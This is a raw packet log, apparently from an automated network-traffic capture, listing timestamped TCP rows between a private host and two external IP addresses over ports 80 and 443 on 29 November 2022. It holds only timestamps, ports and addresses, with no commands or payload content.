                                                                          Nov 29, 2022 09:20:38.807025909 CET44349851103.14.99.114192.168.11.20
                                                                          Nov 29, 2022 09:20:38.933048010 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:38.941822052 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:38.942106962 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:38.942379951 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:38.950925112 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.337285042 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.337395906 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.337474108 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.337546110 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.337565899 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.337619066 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.337683916 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.337694883 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.337769985 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.337841988 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.337897062 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.337898016 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.337913990 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.337986946 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.338057041 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.338083982 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.338084936 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.338129044 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.338201046 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.338201046 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.338277102 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.338337898 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.338417053 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.338417053 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.338417053 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.338418007 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.338418007 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.338525057 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.343271971 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.343364954 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.343431950 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.343493938 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.343533039 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.343533039 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.343555927 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.343616962 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.343616962 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.343621969 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.343686104 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.343746901 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.343808889 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.343841076 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.343841076 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.344018936 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.344018936 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.344018936 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.347188950 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.347274065 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.347342014 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.347404003 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.347466946 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.347529888 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.347567081 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.347568035 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.347568035 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.347594976 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.347662926 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.347728014 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.347790956 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.347790956 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.347791910 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.347852945 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.347903967 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.347903967 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.347903967 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.347917080 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.347980976 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.348043919 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.348071098 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.348105907 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.348169088 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.348233938 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.348242998 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.348243952 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.348243952 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.348457098 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.348469973 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.348543882 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.348607063 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.348669052 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.348728895 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.348752022 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.348752975 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.348789930 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.348850965 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.348908901 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.348973989 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.348974943 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.349159002 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.349159002 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.350584984 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.350678921 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.350744009 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.350827932 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.350836992 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.350912094 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.350939035 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.350977898 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.351039886 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.351100922 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.351162910 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.351162910 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.351164103 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.351164103 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.351334095 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.351500034 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.351500988 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.351500988 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.352669954 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.352757931 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.352854013 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.352897882 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.352925062 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.352988005 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.353050947 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.353059053 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.353059053 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.353115082 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.353178024 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.353178024 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.353178024 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.353243113 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.353307962 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.353347063 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.353347063 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.353347063 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.353370905 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.353456020 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.353524923 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.353579998 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.353784084 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.353785038 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.353785038 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.353785038 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.356801033 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.356874943 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.356933117 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.356986046 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.357038975 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.357094049 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.357167959 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.357224941 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.357224941 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.357367992 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.357367992 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.357508898 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.357650042 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.357861042 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.357916117 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.357939959 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.358000994 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.358055115 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.358108997 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.358187914 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.358186960 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.358186960 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.358247995 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.358303070 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.358357906 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.358365059 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.358365059 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.358365059 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.358411074 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.358464956 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.358500004 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.358517885 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.358572960 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.358628988 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.358688116 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.358688116 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.358688116 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.358689070 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.358689070 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.358701944 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.358762980 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.358820915 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.358855963 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.358855963 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.359035969 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.359088898 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.359222889 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.359222889 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.359237909 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.359294891 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.359328985 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.359374046 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.359438896 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.359497070 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.359498978 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.359555960 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.359613895 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.359671116 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.359671116 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.359671116 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.359671116 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.359683037 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.359844923 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.359844923 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.360044003 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.360219955 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.360280037 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.360375881 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.360436916 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.360436916 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.360471010 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.360531092 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.360584974 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.360637903 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.360668898 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.360668898 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.360691071 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.360745907 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.360817909 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.360929966 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.360996008 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.360996008 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.360996008 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.361200094 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.361217976 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.361275911 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.361330032 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.361381054 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.361386061 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.361442089 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.361495018 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.361547947 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.361553907 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.361553907 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.361553907 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.361603022 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.361638069 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.361820936 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.361820936 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.362168074 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.362224102 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.362277985 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.362330914 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.362340927 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.362385988 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.362442017 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.362473965 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.362473965 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.362641096 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.362641096 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.362730980 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.362787962 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.362812042 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.362843990 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.362893105 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.362946987 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.362983942 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.362983942 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.363001108 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.363029957 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.363056898 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.363112926 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.363166094 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.363209963 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.363209963 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.363219023 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.363274097 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.363297939 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.363297939 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.363327980 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.363382101 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.363435984 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.363488913 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.363516092 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.363517046 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.363517046 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.363545895 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.363661051 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.363796949 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.363827944 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.363828897 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.363828897 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.363900900 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.363959074 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.364016056 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.364069939 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.364124060 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.364151001 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.364151001 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.364151955 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.364177942 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.364223957 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.364351034 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.364351034 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.364414930 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.364495039 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.364507914 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.364552975 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.364608049 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.364660978 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.364679098 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.364679098 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.364713907 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.364765882 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.364769936 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.364824057 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.364876986 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.364929914 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.364939928 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.364939928 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.364939928 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.364940882 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.364983082 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.365036964 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.365091085 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.365109921 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.365109921 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.365278006 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.365278006 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.365278006 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.365278959 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.365977049 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.366148949 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.366170883 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.366209030 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.366264105 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.366337061 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.366353035 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.366353035 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.366385937 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.366519928 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.366519928 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.370352030 CET8049852104.21.44.194192.168.11.20
